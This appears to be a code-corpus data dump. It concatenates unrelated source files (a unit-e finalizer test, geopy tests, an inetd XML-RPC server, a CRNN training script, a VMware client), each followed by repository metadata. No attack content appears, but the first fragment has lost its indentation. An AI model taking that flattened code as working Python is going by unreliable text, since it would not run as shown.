proposer.generatetoaddress(4, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 45)
assert_finalizationstate(proposer, {'currentDynasty': 6,
'currentEpoch': 9,
'lastJustifiedEpoch': 8,
'lastFinalizedEpoch': 7,
'validators': 2})
self.log.info('finalizer1 voted during logout delay successfully')
# During WITHDRAW_DELAY finalizer1 can't vote and can't withdraw
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 8,
'lastFinalizedEpoch': 7,
'validators': 1})
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 9,
'lastFinalizedEpoch': 8,
'validators': 1})
# finalizer1 can't vote so we keep it connected
connect_nodes(finalizer1, proposer.index)
time.sleep(2) # ensure no votes from finalizer1
assert_equal(len(proposer.getrawmempool()), 0)
proposer.generatetoaddress(3, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 50)
assert_finalizationstate(proposer, {'currentDynasty': 7,
'currentEpoch': 10,
'lastJustifiedEpoch': 9,
'lastFinalizedEpoch': 8,
'validators': 1})
# WITHDRAW_DELAY - 2 is because:
# -1 as we checked the first loop manually
# -1 as at this epoch we should be able to withdraw already
for _ in range(WITHDRAW_EPOCH_DELAY - 2):
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
proposer.generatetoaddress(4, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 100)
assert_finalizationstate(proposer, {'currentDynasty': 17,
'currentEpoch': 20,
'lastJustifiedEpoch': 19,
'lastFinalizedEpoch': 18,
'validators': 1})
# last block that finalizer1 can't withdraw
# TODO UNIT-E: allow to create a withdraw tx on checkpoint
# as it will be added to the block on the next epoch only.
# We have an known issue https://github.com/dtr-org/unit-e/issues/643
# that finalizer can't vote after checkpoint is processed, it looks that
# finalizer can't create any finalizer commits at this point (and only at this point).
assert_raises_rpc_error(-8, 'Cannot send withdraw transaction.', finalizer1.withdraw, finalizer1_address)
self.log.info('finalizer1 could not withdraw during WITHDRAW_DELAY period')
# test that deposit can be withdrawn
# e0 - e1 - ... - e6 - ... - e21[101, 102]
# d1 l1 w1
# d2
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 101)
assert_finalizationstate(proposer, {'currentDynasty': 18,
'currentEpoch': 21,
'lastJustifiedEpoch': 19,
'lastFinalizedEpoch': 18,
'validators': 1})
sync_blocks([proposer, finalizer1], timeout=10)
w1 = finalizer1.withdraw(finalizer1_address)
wait_until(lambda: w1 in proposer.getrawmempool(), timeout=10)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1])
self.log.info('finalizer1 was able to withdraw deposit at dynasty=18')
# test that withdraw commit can be spent
# test that deposit can be withdrawn
# e0 - e1 - ... - e6 - ... - e21[101, 102, 103]
# d1 l1 w1 spent_w1
# d2
spent_w1_raw = finalizer1.createrawtransaction(
[{'txid': w1, 'vout': 0}], {finalizer1_address: Decimal('1499.999')})
spent_w1_signed = finalizer1.signrawtransaction(spent_w1_raw)
spent_w1 = finalizer1.sendrawtransaction(spent_w1_signed['hex'])
self.wait_for_transaction(spent_w1, nodes=[proposer])
# mine block
block_hash = proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))[0]
assert spent_w1 in proposer.getblock(block_hash)['tx']
self.log.info('finalizer1 was able to spend withdraw commit')
# Test that after withdraw the node can deposit again
sync_blocks([proposer, finalizer1], timeout=10)
assert_equal(proposer.getblockcount(), 103)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'NOT_VALIDATING',
timeout=5)
deposit = finalizer1.deposit(finalizer1.getnewaddress('', 'legacy'), 1500)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'WAITING_DEPOSIT_CONFIRMATION',
timeout=5)
self.wait_for_transaction(deposit, timeout=10, nodes=[proposer, finalizer1])
proposer.generate(1)
sync_blocks([proposer, finalizer1], timeout=10)
assert_equal(proposer.getblockcount(), 104)
wait_until(lambda: finalizer1.getvalidatorinfo()['validator_status'] == 'WAITING_DEPOSIT_FINALIZATION',
timeout=20)
self.log.info('finalizer1 deposits again')
disconnect_nodes(finalizer1, proposer.index)
proposer.generate(2)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 106)
proposer.generate(5)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 111)
assert_finalizationstate(proposer, {'currentDynasty': 20,
'currentEpoch': 23,
'lastJustifiedEpoch': 21,
'lastFinalizedEpoch': 20,
'validators': 1})
proposer.generate(5)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
assert_equal(proposer.getblockcount(), 116)
assert_finalizationstate(proposer, {'currentDynasty': 21,
'currentEpoch': 24,
'lastJustifiedEpoch': 22,
'lastFinalizedEpoch': 21,
'validators': 2})
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.log.info('finalizer1 votes again')
if __name__ == '__main__':
EsperanzaWithdrawTest().main()
| 46.901695
| 113
| 0.568661
| 13,215
| 0.954841
| 0
| 0
| 0
| 0
| 0
| 0
| 3,760
| 0.271676
|
fbf016290a6953a4fa95305b7831cd89ba6cb242
| 2,213
|
py
|
Python
|
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | 1
|
2019-07-17T14:38:52.000Z
|
2019-07-17T14:38:52.000Z
|
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | null | null | null |
test/geocoders/placefinder.py
|
gongso1st/geopy
|
9252f4b12197ff3c5e3fae50d9bae74974d5d20f
|
[
"MIT"
] | 1
|
2021-06-28T01:20:12.000Z
|
2021-06-28T01:20:12.000Z
|
import unittest
from geopy.compat import u
from geopy.point import Point
from geopy.geocoders import YahooPlaceFinder
from test.geocoders.util import GeocoderTestBase, env
class YahooPlaceFinderTestCaseUnitTest(GeocoderTestBase): # pylint: disable=R0904,C0111
def test_user_agent_custom(self):
geocoder = YahooPlaceFinder(
consumer_key='DUMMYKEY1234',
consumer_secret='DUMMYSECRET',
user_agent='my_user_agent/1.0'
)
self.assertEqual(geocoder.headers['User-Agent'], 'my_user_agent/1.0')
@unittest.skipUnless( # pylint: disable=R0904,C0111
bool(env.get('YAHOO_KEY')) and bool(env.get('YAHOO_SECRET')),
"YAHOO_KEY and YAHOO_SECRET env variables not set"
)
class YahooPlaceFinderTestCase(GeocoderTestBase): # pylint: disable=R0904,C0111
@classmethod
def setUpClass(cls):
cls.geocoder = YahooPlaceFinder(
env['YAHOO_KEY'],
env['YAHOO_SECRET']
)
def test_geocode(self):
"""
YahooPlaceFinder.geocode
"""
self.geocode_run(
{"query": "nyc"},
{"latitude": 40.71455, "longitude": -74.00712},
)
def test_unicode_name(self):
"""
YahooPlaceFinder.geocode unicode
"""
self.geocode_run(
{"query": u("\u6545\u5bab")},
{"latitude": 39.916, "longitude": 116.390},
)
def test_reverse_string(self):
"""
YahooPlaceFinder.reverse string
"""
self.reverse_run(
{"query": "40.75376406311989, -73.98489005863667"},
{"latitude": 40.75376406311989, "longitude": -73.98489005863667}
)
def test_reverse_point(self):
"""
YahooPlaceFinder.reverse Point
"""
self.reverse_run(
{"query": Point(40.75376406311989, -73.98489005863667)},
{"latitude": 40.75376406311989, "longitude": -73.98489005863667}
)
def test_timezone(self):
"""
YahooPlacefinder.with_timezone
"""
self.geocode_run(
{"query": "nyc", "with_timezone": True},
{"latitude": 40.71455, "longitude": -74.00712},
)
| 28.371795
| 87
| 0.598735
| 1,857
| 0.839132
| 0
| 0
| 1,655
| 0.747854
| 0
| 0
| 749
| 0.338455
|
fbf1cd1a479f1f30a64fa316deccf90f2fde6080
| 1,151
|
py
|
Python
|
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
inetdxmlrpc.py
|
Leonidas-from-XIV/sandbox
|
ca1f53d4ba1c27be4397c18bf3d5a2ccf9db6a50
|
[
"WTFPL"
] | null | null | null |
#!/usr/bin/env python2.4
# -*- encoding: latin-1 -*-
"""A small XML-RPC Server running under control
of the internet superserver inetd.
Configuring:
Add this line to your inetd.conf
embedxmlrpc stream tcp nowait user /usr/sbin/tcpd inetdxmlrpc.py
Where user is the user to execute the script and
inetdxmlrpc.py the path to the script.
and this line to your /etc/services
embedxmlrpc 7373/tcp # standalone XML-RPC server
where 7373 will be the port
You have to restart your inetd.
"""
import sys, xmlrpclib
def sumAndDifference(a, b):
    # return both values, as the method name promises (sent as an XML-RPC struct)
    return {'sum': a + b, 'difference': a - b}
funcs = {"sumAndDifference": sumAndDifference}
def inetdcall():
while True:
line = sys.stdin.readline().splitlines()[0]
if "Content-Length:" in line:
cl = line.split()[1]
cl = int(cl)
sys.stdin.readline()
break
request = sys.stdin.read(cl)
params, method = xmlrpclib.loads(request)
result = funcs[method](*params)
response = xmlrpclib.dumps((result,), methodresponse=True)
sys.stdout.write(response)
if __name__ == '__main__':
inetdcall()
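# --- editor's note: shape of a request the handler above accepts (illustrative) ---
# Lines are read from stdin until a Content-Length header, then the raw XML-RPC
# body of that many bytes; a matching body can be produced with:
# body = xmlrpclib.dumps((1, 2), methodname='sumAndDifference')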
| 25.577778
| 77
| 0.645526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 570
| 0.495222
|
fbf23a32edea1c76b286e1eb5b7cddd3cfc77494
| 17,504
|
py
|
Python
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 38
|
2017-04-26T04:00:09.000Z
|
2022-02-10T02:51:05.000Z
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 17
|
2017-11-20T20:47:09.000Z
|
2022-02-09T23:48:46.000Z
|
examples/tensorflow/train/crnn_chinese/code_multi/tools/train_shadownet_multi.py
|
soar-zhengjian/uai-sdk
|
e195bd3fb2b97aca7dac6722d332c25b7070481f
|
[
"Apache-2.0"
] | 28
|
2017-07-08T05:23:13.000Z
|
2020-08-18T03:12:27.000Z
|
"""
Train shadow net script
"""
import argparse
import functools
import itertools
import os
import os.path as ops
import sys
import time
import numpy as np
import tensorflow as tf
import pprint
import shadownet
import six
from six.moves import xrange # pylint: disable=redefined-builtin
sys.path.append('/data/')
from crnn_model import crnn_model
from local_utils import data_utils, log_utils, tensorboard_vis_summary
from global_configuration import config
from uaitrain.arch.tensorflow import uflag
from typing import List
from tensorflow.core.framework import node_def_pb2
from tensorflow.python.framework import device as pydev
from tensorflow.python.training import device_setter
tf.app.flags.DEFINE_string('dataset_dir','/data/data/tfrecords','data path')
tf.app.flags.DEFINE_string('weights_path',None,'weight path')
FLAGS = tf.app.flags.FLAGS
logger = log_utils.init_logger()
def local_device_setter(num_devices=1,
ps_device_type='cpu',
worker_device='/cpu:0',
ps_ops=None,
ps_strategy=None):
    if ps_ops is None:
ps_ops = ['Variable', 'VariableV2', 'VarHandleOp']
if ps_strategy is None:
ps_strategy = device_setter._RoundRobinStrategy(num_devices)
if not six.callable(ps_strategy):
raise TypeError("ps_strategy must be callable")
def _local_device_chooser(op):
current_device = pydev.DeviceSpec.from_string(op.device or "")
node_def = op if isinstance(op, node_def_pb2.NodeDef) else op.node_def
if node_def.op in ps_ops:
ps_device_spec = pydev.DeviceSpec.from_string(
'/{}:{}'.format(ps_device_type, ps_strategy(op)))
ps_device_spec.merge_from(current_device)
return ps_device_spec.to_string()
else:
worker_device_spec = pydev.DeviceSpec.from_string(worker_device or "")
worker_device_spec.merge_from(current_device)
return worker_device_spec.to_string()
return _local_device_chooser
def get_words_from_chars(characters_list: List[str], sequence_lengths: List[int], name='chars_conversion'):
with tf.name_scope(name=name):
        def join_characters_fn(coords):
            return tf.reduce_join(characters_list[coords[0]:coords[1]])
def coords_several_sequences():
end_coords = tf.cumsum(sequence_lengths)
start_coords = tf.concat([[0], end_coords[:-1]], axis=0)
coords = tf.stack([start_coords, end_coords], axis=1)
coords = tf.cast(coords, dtype=tf.int32)
            return tf.map_fn(join_characters_fn, coords, dtype=tf.string)
def coords_single_sequence():
return tf.reduce_join(characters_list, keep_dims=True)
words = tf.cond(tf.shape(sequence_lengths)[0] > 1,
true_fn=lambda: coords_several_sequences(),
false_fn=lambda: coords_single_sequence())
return words
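# Worked example (editor's note): with characters_list = ['a', 'b', 'c', 'd']
# and sequence_lengths = [2, 2], the several-sequences branch joins the slices
# [0:2] and [2:4], yielding the string tensor ['ab', 'cd'].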
def get_shadownet_fn(num_gpus, variable_strategy, num_workers):
"""Returns a function that will build shadownet model."""
def _shadownet_fun(features, labels, mode, params):
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
tower_features = features
tower_labels = labels
tower_losses = []
tower_gradvars = []
tower_preds = []
tower_tensor_dict = []
tower_seq_len = []
num_devices = num_gpus
device_type = 'gpu'
tower_batch_size = int(params.batch_size / num_devices)
for i in range(num_devices):
worker_device = '/{}:{}'.format(device_type, i)
device_setter = local_device_setter(worker_device=worker_device)
with tf.variable_scope('shadownet', reuse=bool(i != 0)):
with tf.name_scope('tower_%d' % i) as name_scope:
with tf.device(device_setter):
loss, gradvars, preds, tensor_dict, seq_len = _tower_fn(
is_training, tower_features[i], tower_labels[i], tower_batch_size, params.l_size)
tower_losses.append(loss)
tower_gradvars.append(gradvars)
tower_preds.append(preds)
tower_tensor_dict.append(tensor_dict)
tower_seq_len.append(seq_len)
if i == 0:
# Only trigger batch_norm moving mean and variance update from
# the 1st tower. Ideally, we should grab the updates from all
# towers but these stats accumulate extremely fast so we can
# ignore the other stats from the other towers without
# significant detriment.
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS,
name_scope)
# Now compute global loss and gradients.
gradvars = []
with tf.name_scope('gradient_averaging'):
all_grads = {}
for grad, var in itertools.chain(*tower_gradvars):
if grad is not None:
all_grads.setdefault(var, []).append(grad)
for var, grads in six.iteritems(all_grads):
# Average gradients on the same device as the variables
with tf.device(var.device):
if len(grads) == 1:
avg_grad = grads[0]
else:
avg_grad = tf.multiply(tf.add_n(grads), 1. / len(grads))
gradvars.append((avg_grad, var))
# Device that runs the ops to apply global gradient updates.
consolidation_device = '/gpu:0' if variable_strategy == 'GPU' else '/cpu:0'
with tf.device(consolidation_device):
global_step = tf.train.get_global_step()
starter_learning_rate = params.learning_rate
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
params.decay_steps, params.decay_rate,
staircase=True)
loss = tf.reduce_mean(tower_losses, name='loss')
decoded, log_prob = tf.nn.ctc_beam_search_decoder(tower_preds[0],
tower_seq_len[0]*np.ones(tower_batch_size),
merge_repeated=False)
sequence_dist = tf.reduce_mean(tf.edit_distance(tf.cast(decoded[0], tf.int32), tower_labels[0]))
sequence_lengths_pred = tf.bincount(tf.cast(decoded[0].indices[:, 0], tf.int32),
minlength=tf.shape(tower_labels[0])[1])
label_lengths_pred = tf.bincount(tf.cast(labels[0].indices[:, 0], tf.int32),
minlength=tf.shape(tower_labels[0])[1])
tensors_to_log = {'global_step': global_step, 'learning_rate': learning_rate, 'loss': loss}
dist_to_log = {'global_step': global_step,
'learning_rate': learning_rate,
'loss': loss,
'train_seq_dist': sequence_dist,
'sequence_lengths_pred': sequence_lengths_pred,
'label_lengths_pred': label_lengths_pred}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=10)
dist_hook = tf.train.LoggingTensorHook(
tensors=dist_to_log, every_n_iter=1000)
train_hooks = [logging_hook, dist_hook]
seq_dist_sum = tf.summary.scalar(name='Seq_Dist', tensor=sequence_dist)
lr_sum = tf.summary.scalar(name='Learning_rate', tensor=learning_rate)
summaries = [seq_dist_sum, lr_sum]
summary_hook = tf.train.SummarySaverHook(
save_steps=1000,
output_dir='/data/output/',
summary_op=summaries)
optimizer = tf.train.AdadeltaOptimizer(learning_rate=learning_rate)
if params.sync:
optimizer = tf.train.SyncReplicasOptimizer(
optimizer, replicas_to_aggregate=num_workers)
sync_replicas_hook = optimizer.make_session_run_hook(params.is_chief)
train_hooks.append(sync_replicas_hook)
# Create single grouped train op
train_op = [
optimizer.apply_gradients(
gradvars, global_step=tf.train.get_global_step())
]
train_op.extend(update_ops)
train_op = tf.group(*train_op)
return tf.estimator.EstimatorSpec(
mode=mode,
loss=loss,
train_op=train_op,
training_hooks=train_hooks)
return _shadownet_fun
def _tower_fn(is_training, feature, label, batch_size, l_size):
seq_len=l_size
shadownet = crnn_model.ShadowNet(phase='Train', hidden_nums=256, layers_nums=2, seq_length=seq_len,
num_classes=config.cfg.TRAIN.CLASSES_NUMS, rnn_cell_type='lstm')
imgs = tf.image.resize_images(feature, (32, l_size*4), method=0)
input_imgs = tf.cast(x=imgs, dtype=tf.float32)
with tf.variable_scope('shadow', reuse=False):
net_out, tensor_dict = shadownet.build_shadownet(inputdata=input_imgs)
cost = tf.reduce_mean(tf.nn.ctc_loss(labels=label, inputs=net_out,
sequence_length=seq_len*np.ones(batch_size)))
#lstm l2 normalization loss
lstm_tv = tf.trainable_variables(scope='LSTMLayers')
r_lambda = 0.001
regularization_cost = r_lambda * tf.reduce_sum([tf.nn.l2_loss(v) for v in lstm_tv])
cost = cost + regularization_cost
model_params = tf.trainable_variables()
tower_grad = tf.gradients(cost, model_params)
return cost, zip(tower_grad, model_params), net_out, tensor_dict, seq_len
def input_fn(data_dir,
subset,
num_shards,
batch_size,
use_distortion_for_training=True):
"""Create input graph for model.
Args:
data_dir: Directory where TFRecords representing the dataset are located.
subset: one of 'train', 'validate' and 'eval'.
num_shards: num of towers participating in data-parallel training.
batch_size: total batch size for training to be divided by the number of
shards.
use_distortion_for_training: True to use distortions.
Returns:
        feature_shards, label_shards: per-tower lists of feature tensors and
        matching sparse label tensors, one entry per shard.
"""
with tf.device('/cpu:0'):
use_distortion = subset == 'train' and use_distortion_for_training
dataset = shadownet.ShadownetDataSet(data_dir, subset, use_distortion)
inputdata, input_labels = dataset.make_batch(batch_size)
if num_shards <= 1:
# No GPU available or only 1 GPU.
num_shards = 1
feature_shards = tf.split(inputdata, num_shards)
label_shards = tf.sparse_split(sp_input=input_labels, num_split=num_shards, axis=0)
return feature_shards, label_shards
def get_experiment_fn(data_dir,
num_gpus,
use_distortion_for_training=True):
def _experiment_fn(run_config, hparams):
"""Returns an Experiment."""
# Create estimator.
train_input_fn = functools.partial(
input_fn,
data_dir,
subset='train',
num_shards=num_gpus,
batch_size=hparams.batch_size,
use_distortion_for_training=use_distortion_for_training)
eval_input_fn = functools.partial(
input_fn,
data_dir,
subset='validation',
batch_size=hparams.batch_size,
num_shards=num_gpus)
train_steps = hparams.steps
eval_steps = 2048 // hparams.batch_size
variable_strategy = 'CPU'
classifier = tf.estimator.Estimator(
model_fn=get_shadownet_fn(num_gpus,
variable_strategy,
run_config.num_worker_replicas or 1),
config=run_config,
params=hparams)
# Create experiment.
return tf.contrib.learn.Experiment(
classifier,
train_input_fn=train_input_fn,
eval_input_fn=eval_input_fn,
train_steps=train_steps,
eval_steps=eval_steps,
min_eval_frequency=100)
return _experiment_fn
def main(num_gpus, log_device_placement, num_intra_threads, data_dir, output_dir, tfrecord_dir, **hparams):
# The env variable is on deprecation path, default is set to off.
os.environ['TF_SYNC_ON_FINISH'] = '0'
os.environ['TF_ENABLE_WINOGRAD_NONFUSED'] = '1'
data_dir = os.path.join(data_dir, tfrecord_dir)
# Session configuration.
sess_config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=log_device_placement,
intra_op_parallelism_threads=num_intra_threads,
gpu_options=tf.GPUOptions(force_gpu_compatible=True))
config = tf.contrib.learn.RunConfig(session_config=sess_config, model_dir=output_dir)
tf.contrib.learn.learn_runner.run(
get_experiment_fn(data_dir, num_gpus),
run_config=config,
hparams=tf.contrib.training.HParams(
is_chief=config.is_chief,
**hparams))
if __name__ == '__main__':
# init args
# args = init_args()
#if not ops.exists(args.dataset_dir):
# raise ValueError('{:s} doesn\'t exist'.format(args.dataset_dir))
#train_shadownet(args.dataset_dir, args.weights_path)
# if args.weights_path is not None and 'two_stage' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=False)
# elif args.weights_path is not None and 'cnnsub' in args.weights_path:
# train_shadownet(args.dataset_dir, args.weights_path, restore_from_cnn_subnet_work=True)
# else:
# train_shadownet(args.dataset_dir)
parser = argparse.ArgumentParser()
parser.add_argument(
'--num_gpus',
type=int,
default=1,
help='UAI-SDK related. The number of gpus used.')
parser.add_argument(
'--log-device-placement',
action='store_true',
default=False,
help='Whether to log device placement.')
parser.add_argument(
'--num-intra-threads',
type=int,
default=0,
help="""\
Number of threads to use for intra-op parallelism. When training on CPU
set to 0 to have the system pick the appropriate number or alternatively
set it to the number of physical CPU cores.\
""")
parser.add_argument(
'--num-inter-threads',
type=int,
default=0,
help="""\
Number of threads to use for inter-op parallelism. If set to 0, the
system will pick an appropriate number.\
""")
parser.add_argument(
'--sync',
action='store_true',
default=False,
help="""\
If present when running in a distributed environment will run on sync mode.\
""")
parser.add_argument(
'--work_dir',
type=str,
default='/data/',
help='UAI SDK related.')
parser.add_argument(
'--data_dir',
type=str,
required=True,
    help='UAI-SDK related. The directory where the input TFRecord data is stored.')
parser.add_argument(
'--output_dir',
type=str,
required=True,
help='UAI-SDK related. The directory where the model will be stored.')
parser.add_argument(
'--log_dir',
type=str,
default='/data/data/',
help='UAI SDK related.')
parser.add_argument(
'--l_size',
type=int,
default=10,
help="""l_batch_label, how many labels CNN net work will output into LSTM""")
parser.add_argument(
'--learning_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_rate',
type=float,
default=0.1)
parser.add_argument(
'--decay_steps',
type=int,
default=40000)
parser.add_argument(
'--steps',
type=int,
default=200000)
parser.add_argument(
'--batch_size',
type=int,
default=512)
parser.add_argument(
'--tfrecord_dir',
type=str,
default='tfrecords')
args = parser.parse_args()
main(**vars(args))
print('Done')
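# Hypothetical invocation (script name and paths are placeholders, not from
# the original source):
#   python train.py --data_dir /data --output_dir /data/output \
#       --num_gpus 1 --batch_size 512 --l_size 10 --learning_rate 0.1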
| 40.424942
| 159
| 0.584324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,428
| 0.195841
|
fbf29fa665c3f19650fb43d520ce03961090f743
| 7,007
|
py
|
Python
|
ovs/extensions/hypervisor/hypervisors/vmware.py
|
mflu/openvstorage_centos
|
280a98d3e5d212d58297e0ffcecd325dfecef0f8
|
[
"Apache-2.0"
] | 1
|
2015-08-29T16:36:40.000Z
|
2015-08-29T16:36:40.000Z
|
ovs/extensions/hypervisor/hypervisors/vmware.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
ovs/extensions/hypervisor/hypervisors/vmware.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module for the VMware hypervisor client
"""
import os
from ovs.extensions.hypervisor.apis.vmware.sdk import Sdk
class VMware(object):
"""
Represents the hypervisor client for VMware
"""
def __init__(self, ip, username, password):
"""
Initializes the object with credentials and connection information
"""
self.sdk = Sdk(ip, username, password)
self.state_mapping = {'poweredOn' : 'RUNNING',
'poweredOff': 'HALTED',
'suspended' : 'PAUSED'}
def get_state(self, vmid):
"""
Get the current power state of a virtual machine
@param vmid: hypervisor id of the virtual machine
"""
return self.state_mapping[self.sdk.get_power_state(vmid)]
def create_vm_from_template(self, name, source_vm, disks, ip, mountpoint, wait=True):
"""
Create a new vmachine from an existing template
"""
task = self.sdk.create_vm_from_template(name, source_vm, disks, ip, mountpoint, wait)
if wait is True:
if self.sdk.validate_result(task):
task_info = self.sdk.get_task_info(task)
return task_info.info.result.value
return None
def clone_vm(self, vmid, name, disks, wait=False):
"""
Clone a vmachine
@param vmid: hypervisor id of the virtual machine
@param name: name of the virtual machine
@param disks: list of disk information
@param wait: wait for action to complete
"""
task = self.sdk.clone_vm(vmid, name, disks, wait)
if wait is True:
if self.sdk.validate_result(task):
task_info = self.sdk.get_task_info(task)
return task_info.info.result.value
return None
def delete_vm(self, vmid, storagedriver_mountpoint, storagedriver_storage_ip, devicename, disks_info=None, wait=False):
"""
Remove the vmachine from the hypervisor
@param vmid: hypervisor id of the virtual machine
@param wait: wait for action to complete
"""
if disks_info is None:
disks_info = []
_ = disks_info
self.sdk.delete_vm(vmid, storagedriver_mountpoint, storagedriver_storage_ip, devicename, wait)
def get_vm_object(self, vmid):
"""
Gets the VMware virtual machine object from VMware by its identifier
"""
return self.sdk.get_vm(vmid)
def get_vm_agnostic_object(self, vmid):
"""
Gets the VMware virtual machine object from VMware by its identifier
"""
return self.sdk.make_agnostic_config(self.sdk.get_vm(vmid))
def get_vm_object_by_devicename(self, devicename, ip, mountpoint):
"""
Gets the VMware virtual machine object from VMware by devicename
and datastore identifiers
"""
return self.sdk.make_agnostic_config(self.sdk.get_nfs_datastore_object(ip, mountpoint, devicename)[0])
def get_vms_by_nfs_mountinfo(self, ip, mountpoint):
"""
Gets a list of agnostic vm objects for a given ip and mountpoint
"""
for vm in self.sdk.get_vms(ip, mountpoint):
yield self.sdk.make_agnostic_config(vm)
def is_datastore_available(self, ip, mountpoint):
"""
@param ip : hypervisor ip to query for datastore presence
@param mountpoint: nfs mountpoint on hypervisor
@rtype: boolean
@return: True | False
"""
return self.sdk.is_datastore_available(ip, mountpoint)
def set_as_template(self, vmid, disks, wait=False):
"""
Configure a vm as template
This lets the machine exist on the hypervisor but configures
all disks as "Independent Non-persistent"
@param vmid: hypervisor id of the virtual machine
"""
return self.sdk.set_disk_mode(vmid, disks, 'independent_nonpersistent', wait)
def mount_nfs_datastore(self, name, remote_host, remote_path):
"""
Mounts a given NFS export as a datastore
"""
return self.sdk.mount_nfs_datastore(name, remote_host, remote_path)
def test_connection(self):
"""
Checks whether this node is a vCenter
"""
return self.sdk.test_connection()
def clean_backing_disk_filename(self, path):
"""
Cleans a backing disk filename to the corresponding disk filename
"""
_ = self
return path.replace('-flat.vmdk', '.vmdk').strip('/')
def get_backing_disk_path(self, machinename, devicename):
"""
Builds the path for the file backing a given device/disk
"""
_ = self
return '/{}/{}-flat.vmdk'.format(machinename.replace(' ', '_'), devicename)
def get_disk_path(self, machinename, devicename):
"""
Builds the path for the file backing a given device/disk
"""
_ = self
return '/{}/{}.vmdk'.format(machinename.replace(' ', '_'), devicename)
def clean_vmachine_filename(self, path):
"""
Cleans a VM filename
"""
_ = self
return path.strip('/')
def get_vmachine_path(self, machinename, storagerouter_machineid):
"""
Builds the path for the file representing a given vmachine
"""
_ = self, storagerouter_machineid # For compatibility purposes only
machinename = machinename.replace(' ', '_')
return '/{}/{}.vmx'.format(machinename, machinename)
def get_rename_scenario(self, old_name, new_name):
"""
Gets the rename scenario based on the old and new name
"""
_ = self
if old_name.endswith('.vmx') and new_name.endswith('.vmx'):
return 'RENAME'
elif old_name.endswith('.vmx~') and new_name.endswith('.vmx'):
return 'UPDATE'
return 'UNSUPPORTED'
def should_process(self, devicename, machine_ids=None):
"""
Checks whether a given device should be processed
"""
_ = self, devicename, machine_ids
return True
def file_exists(self, vpool, devicename):
"""
Check if devicename exists on the given vpool
"""
_ = self
filename = '/mnt/{0}/{1}'.format(vpool.name, devicename)
return os.path.exists(filename) and os.path.isfile(filename)
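# Hypothetical usage sketch (the IP, credentials and vmid below are
# placeholder values, not from the original source); it only illustrates the
# intended call pattern of the client defined above.
def _example_usage():
    client = VMware('10.0.0.1', 'admin', 'secret')
    if client.test_connection():
        # maps the raw vSphere power state to 'RUNNING'/'HALTED'/'PAUSED'
        return client.get_state('vm-123')
    return None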
| 34.860697
| 123
| 0.628942
| 6,306
| 0.899957
| 252
| 0.035964
| 0
| 0
| 0
| 0
| 3,185
| 0.454545
|
fbf2ccc900304e6fa6940b6cc3e4418b5177231a
| 6,314
|
py
|
Python
|
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | null | null | null |
fake_switches/dell10g/command_processor/config_interface.py
|
idjaw/fake-switches
|
9b481e17a26cca24bf3ef44466feebf9bff794f8
|
[
"Apache-2.0"
] | 1
